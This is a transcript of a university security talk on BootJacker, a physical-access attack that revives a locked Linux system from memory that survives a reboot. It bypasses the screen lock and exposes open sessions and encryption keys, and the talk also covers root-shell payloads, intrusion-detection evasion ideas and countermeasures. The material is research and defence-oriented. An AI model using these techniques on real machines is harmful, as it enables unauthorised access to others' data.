Okay. So I'll quickly go on to the other thing as well.
So this is the last slide I had on this thing. So you can also do some hardware-based techniques
in order to detect such rootkits.
And the last couple of notes I had here were if you have a more sophisticated version, you can
also start interpreting OS structures and do more damage. And the thing about this rootkit is it's
really hard to write because it interacts with the architecture at a really low level, so it definitely
discourages script (inaudible).
So I'm going to move on to the next section of my talk, and I should be able to finish in half an
hour, and that's about the other tool that we did which compromises systems using forced restart.
So the observation here is volatile memory is not really volatile. Alex Haldiman (phonetic) is
going to present a paper at (inaudible) security in a couple of months where he shows a
technique to extract encryption keys from memory after pulling out the dims (phonetic) and
putting in another PC and just imaging the memory. And it's not really a new thing. As far back
as 1979 people have looked at this problem and they've shown that you can actually have this
memory persist for a whole week, in fact.
And the thing here is you can also revive a complete system. And this is a paper that we wrote.
It was published at the USENIX Technical Conference in the middle of last year. And we showed
that we can use this volatile memory preservation property to revive a system that's been locked
up and it's been reset by a watchdog timer. And we essentially did it for reliability reasons, but it's
much more interesting to look at it from a security perspective.
And what I'm going to show you in the next custom of slides is kind of like an illustration of how
this attack would happen. So say Alice is working on her computer. She has a couple of
applications opened up. There's a banking applications or -- essentially she's opened up secure
connections to various places. There's a VPN that's running and so on. And she walks away
from her computer temporarily, locks the screen, and Trudy walks in, and she has brief access to
the computer, and it's a locked screen. What does she do?
So what Trudy does is she has BootJacker. She forces the computer to restart in some manner,
either unplug the power, put it back in, or use some OS support, and plugs in BootJacker as an
alternate boot medium. And what BootJacker is able to do is it's able to revive the complete
existing system that was running before. And since it starts up at a lower level, now it can go and
switch off any sort of access-control mechanism that was in place. So it can disable the
screensaver lock, for example. So that kind of gives the overview of the attack. We didn't really
do it for Windows like I showed there, we implemented it only for Linux right now.
So the requirements for this whole attack are you had to have physical access to the system.
Secrets have to be in memory. There's no point in trying to revive the system if there's no
encryption key or there's nothing interesting in memory. And there has to be some way of
restarting the system.
On the Linux platform you have a SysRq key combination. So it's a magic key sequence that you
hit in order to immediately restart the computer. You can also power cycle it. And you also have
to have an alternate boot path. So you should be able to boot from a different device. And you
can have that support either from the BIOS, or if there's a boot loader, the boot loader could also
let you do booting from a different device. And the memory shouldn't be significantly clobbered
by that BIOS. So if BIOS for this booting up goes and erases all of memory, the attack is
worthless. And it targets net space operating systems.
So let's look at the -- assuming that all the other requirements are okay, let's look at the BIOS
memory clobber behavior.
Yes?
>>: So is there specific secure system that is less secure that was considered to be more secure
than it actually is and that this research has uncovered that it is not that secure? Is it that when
I -- when I lock my machine, I assume that if somebody has physical access, that they can do
something just because I have read about a USB-based malware. Maybe there was -- what is it?
>> Francis David: So say, for example, you were using -- I mean, you're aware of all such -- I
mean, you are aware of theft, essentially, and you rely on encrypted disks and you rely on VPN
connections, tunnels and everything, in order to kind of really protect your information, even in the
face of theft.
So you assume in some sense that once I have an encrypted disk and I've locked my screen and
everything, I've hibernated my system and I've walked away, that if somebody steals my laptop,
they still won't be able to get to my disk because when they boot it up back again you need to
enter your password again in order to get to your data.
So what I'm showing here is that you can still get to secure data as well by reviving the whole
system. I'm showing here that it's -- the problem isn't new. Like I said before, Alex is going to
have a demonstration using security where he has a way of retrieving the keys.
What I'm showing here is a way to revive the whole system. There's no need to look for any keys
at all because you can just use the application directly. So you don't have to search for anything.
You can revive the complete system.
>>: So the commercial systems that do hibernate and have the encrypted disk -- I don't know, I
think we have one -- do they not encrypt memory?
>> Francis David: For hibernated systems? Some hibernated systems on the Linux kernel,
some of them do, some of them don't. The newer ones do. In this case we didn't actually even
look at hibernated systems, we just looked at a screensaver lock kind of protection. So as long
as it's just sleeping, you open it up, there's a screensaver lock, and your keys are still in memory.
So if there's authentication -- if you walk away and it still requires authentication in order to get
your keys, then our system is ineffective against such architectures.
Yes?
>>: Would it be sufficient to protect your system to, when the screen is locked, to dump the keys
and then have the log-in authentication regenerate the keys?
>> Francis David: Yes. So the attack we're essentially exploiting here is essentially ability to
access secrets in memory. So if there's no secrets in memory, it's worthless.
So in order to study the BIOS behavior for clobbering memory we wrote a tool that's on a CD.
You can boot it up and it will write a pattern to memory, reboot, and then check if a pattern exists.
We ran it in a whole bunch of systems, and interestingly, Dell laptops totally wipe out their
memory for some reason. The attack is totally ineffective against any Dell laptop. And I have a
Dell laptop.
But ThinkPads, all ThinkPads, even the newest ones, preserve a lot of memory so there's very
little memory that gets erased.
>>: (Inaudible) actually Vista Bootlocker requires (inaudible) and requires memory to get over it
(inaudible) on the BIOS.
>> Francis David: Dell does (inaudible).
>>: (Inaudible).
>> Francis David: So the memory that I'm talking about here is only extended memory,
everything above the 1 megabyte boundary. The first 640 K of memory is always used up by the
BIOS while it's running and totally messes it up.
On the Linux platform, the first eight megabytes are reserved for like ISA card, DMA (phonetic),
so the Linux card doesn't really use up that memory, which is why we're able to revive the
system.
All the clobbered memory in first 640 K doesn't matter.
So these are a bunch of different laptops and a desktop that we tested this on.
And so there's two aspects to this attack, right? First thing is how do you revive the software part
of it and how do you revive the hardware part of it, because it is a reset, and the hardware also
gets reset.
So the software resuscitation. The goal is essentially to resume execution of the software
environment, and what we do is essentially come up with a processor context that we just restore
on the CPU which lets the system -- enables the system to continue running.
And for our attack right now we assume that we're using the Linux SysRq magic key to reboot the
system. It's, by default, enabled on all (inaudible) based systems and a couple of other
distributions as well. So you hit "alt SysRq B" and it immediately reboots the system.
And what we do here is in the revival code we go through the stacks, find the stack in which the
reboot handler was called. So this is an operating-system-specific attack, so it needs to know the
layout of the system and so on.
And it finds a stack and it essentially creates a context that makes it seem like this reboot function
returned without actually rebooting. And we verified that if you do that, the system actually
continues to work.
And so while reviving the system, we will also find the page tables for the process that was
running and enable those page tables so that the system doesn't crash as soon as you restore
this context on the processor.
So for the hardware resuscitation we looked at -- I'm not going to say that we revived all the
hardware on the system. We looked at some set of hardware, and the thing to note here is
sometimes Linux automatically revives some devices for you. For example, the disk. We didn't
really write any code for that. And it's part of the internal recovery mechanisms of the operating
system.
So Linux automatically reinitializes the controller and it revives the disk, so we don't have to do
anything for the disk.
Even the network cards offer a little bit of time in order to do it. What we did, we sped it up a little
bit by forcing the timer (inaudible) faster.
The display, if it's a Linux-based system you can always restore text console before running the
BootJacker tool. Once it revives it back, it's back in the text console and then you go back to the
graphic console and that reinitializes the display.
And the parts that we actually had to write code for was actually enabling the FPU -- and this is
on the x86 -- and enabling the interrupt controller system timers and the keyboards and the mice.
And this is essentially very architecture specific, and this is not done automatically by the OS.
Some things we can rely on the OS to fix, some things we can't.
We wrote a couple of payloads for this thing as well, simple payloads essentially which kill a
process, which we essentially used to kill the screensaver process. And we did another payload
which spawns a root shell which invokes the shell command on the system with super user
privileges. And this would essentially end up being on a virtual console on the Linux system
which is unused. And you can switch to a whole bunch of virtual consoles in the Linux system by
using a couple of keyboard combinations.
And to evaluate BootJacker, for the correctness test we ran a lot of applications and interrupted
these applications in between to see if they resumed execution correctly. We did DCC (inaudible)
JPEG encoding, AES encryption, and all of these applications continued to run and complete
properly after the reboot.
The other thing we looked at was, of course, since we revived the whole system, we do get
access to any program that's running. So just to prove the point we ran arbitrarily secure
programs. You open up an SSH connection to somebody else. Once you reboot, the connection
is still open. Or a web browser session. So if you have a banking session open, you can reboot,
the lock is gone, you still have the banking session open. We did it with a VPN connection, and
we also did it with Linux software-based disk-encryption technologies.
And the key point to note here in this thing is essentially, unlike key retrieval attacks which you
need to go look for a particular key, you have to figure out how to use it, you have to have
completely different support to do anything useful with those keys, and there's no need to tailor
the attack for a particular key size or any such small detail, so we essentially (inaudible) the
whole system. Everything is available to us.
And as for countermeasures, you think that securing the boot process may be enough. If you
look at the requirements that I had before, this is requirement for an alternate boot path. And I
would argue that securing the boot path or even just doing memory clearing in the BIOS doesn't
really help that much because you can do a memory-imaging attack just like Alex did. So he took
out the dims (phonetic), put it somewhere else, and revived the system.
So you can always move the memory (inaudible) to a different computer. ECC is interesting
because we never managed to get ECC memory to retain its contents. So it was always reset.
And Alex also reports the same behavior.
And hardware-based solution is probably something that's more appropriate here. There's a
colleague at the University of Illinois (inaudible) who is actually going to be here for a
post-acquisition sometime soon. He's working on this notion of a secure core processor which
essentially has all the secrets. So as long as you make sure there's no secrets in volatile
memory, we can essentially avert this attack.
Yes?
>>: (Inaudible) countermeasure and just have the other authentication factor be something like
the user's password and encrypt all of the memory, then there's no key in memory.
>> Francis David: Okay. If you're essentially tying your authentication for the log-in with
memory, yes, that's definitely a possibility as well.
>>: Now, it will work (inaudible).
>> Francis David: Assuming it's a single-user desktop, the solution is definitely. So as long as
you encrypt the whole system and it's all tied to your authentication ID, you're fine.
So essentially the thing we're exploiting, like I said before, is as long as the secret's in memory,
we can get to it. If there's nothing in memory, if it's all encrypted, we can't get to it.
>>: So the hardware that you're taking advantage of is this interrupt that lets you restart the
machine (inaudible).
>> Francis David: Yes. So the hardware behavior, the memory behavior, the (inaudible)
behavior.
So we're at the conclusion slide, but I have a couple of slides after that as well, and I have time.
So what I've been talking to you today about was a couple of exploits of, I guess, some of a class
of security gaps which exist in the boundary between architecture and system software. And
similar attacks can also exist in other operating systems and other hardware. We haven't looked
at it, but there's other people doing work on this as well. There's a recent news article about
somebody looking at the system management mode on x86 to do something similar. And they've
been talking about the same thing as well that we did with Cloaker where they run a separate
operating system totally divorced from the existing operating system as well, and essentially
system designers construct such possible attacks when they're designing secure systems.
So before I conclude I just want to talk about a couple of -- just give you a brief overview of some
of the other work that I've been doing for my Ph.D.
And so I did a lot of work in OS dependability. We first looked at how we used exceptions for
error handling. We looked at OS lockup recovery from watchdog-based research, which kind of
led to the BootJacker attack. So we actually propose that as a security issue, it seems to raise
more eyebrows, but we did talk about it at USENIX (inaudible).
And the other thing that we're doing is building an operating system that's using
hardware-isolated and micro-rebootable components with state management. So when you're
talking about micro-rebooting these components in a microkernel, you have to be careful about
the state that's maintained in each of these components.
So if you take a component that has, for example, the network stack, if you arbitrarily reboot that
component, if there's an error in the component, what happens is all the existing applications that
are using networking will fail because all the state is lost. So in our system there's a networking
stack that's completely restartable because all the state for each individual session is isolated in
separate places in memory in these green things here, and the states are mapped in and out on
demand using hardware support.
So those are a couple of other things that we've been working on, and the idea wasn't (inaudible).
We were hoping to get the final paper published somewhere else.
As far as future work, I've shown you a bunch of these vulnerabilities. I'm sure there's lots more
vulnerabilities that are possible in multicore architectures, a lot of debug features in these
systems. I was reading, for example, about the SPARK architecture. It provides support for
essentially injecting falls and simulating falls. It will take a processor offline in this many falls that
happen in the system.
So if such multicore systems led to, for example, offline a core and if malware can exploit that
and actually make the OS think that it's offlined the core but actually runs the malware in the
other core, it's a possible attack vector. So there's possible things there.
We haven't looked at it in too much detail, but it's something that is worth looking at. And
exploiting hardware virtualization support. And now that you can also do computations on the
GPUs you can think of ways that you can probably maybe have malware running on the GPU as
well.
I mean, not everything is going to -- they're all going to have the INVIDIA cards, but not
everybody is going to use those INVIDIA cards for general-purposes computations.
So there's a wealth of possible venues here for malware to exploit, and we need to look at
defenses for such attacks, come up with hardware/software solutions. It has to be a collaborative
solution mostly.
And the other thing that I've been toying with is essentially to come up with a way to evade
intrusion detection systems that are running on a computer by having user-based processes
directly interact with the hardware. So if it's memory-mapped hardware, you could still use these
TLB tricks that I was talking to you about in order to give a user-based processor direct access to
hardware. And by not using the OS API, which is where the monitoring is done for typical
intrusion detection systems, that could give you a little bit more stealth in some sense. And that's
another idea I've been toying with.
And I guess I'm pretty close to the end of the time, so I can take more questions.
(Applause)
No questions? Okay. Thank you very much.
Download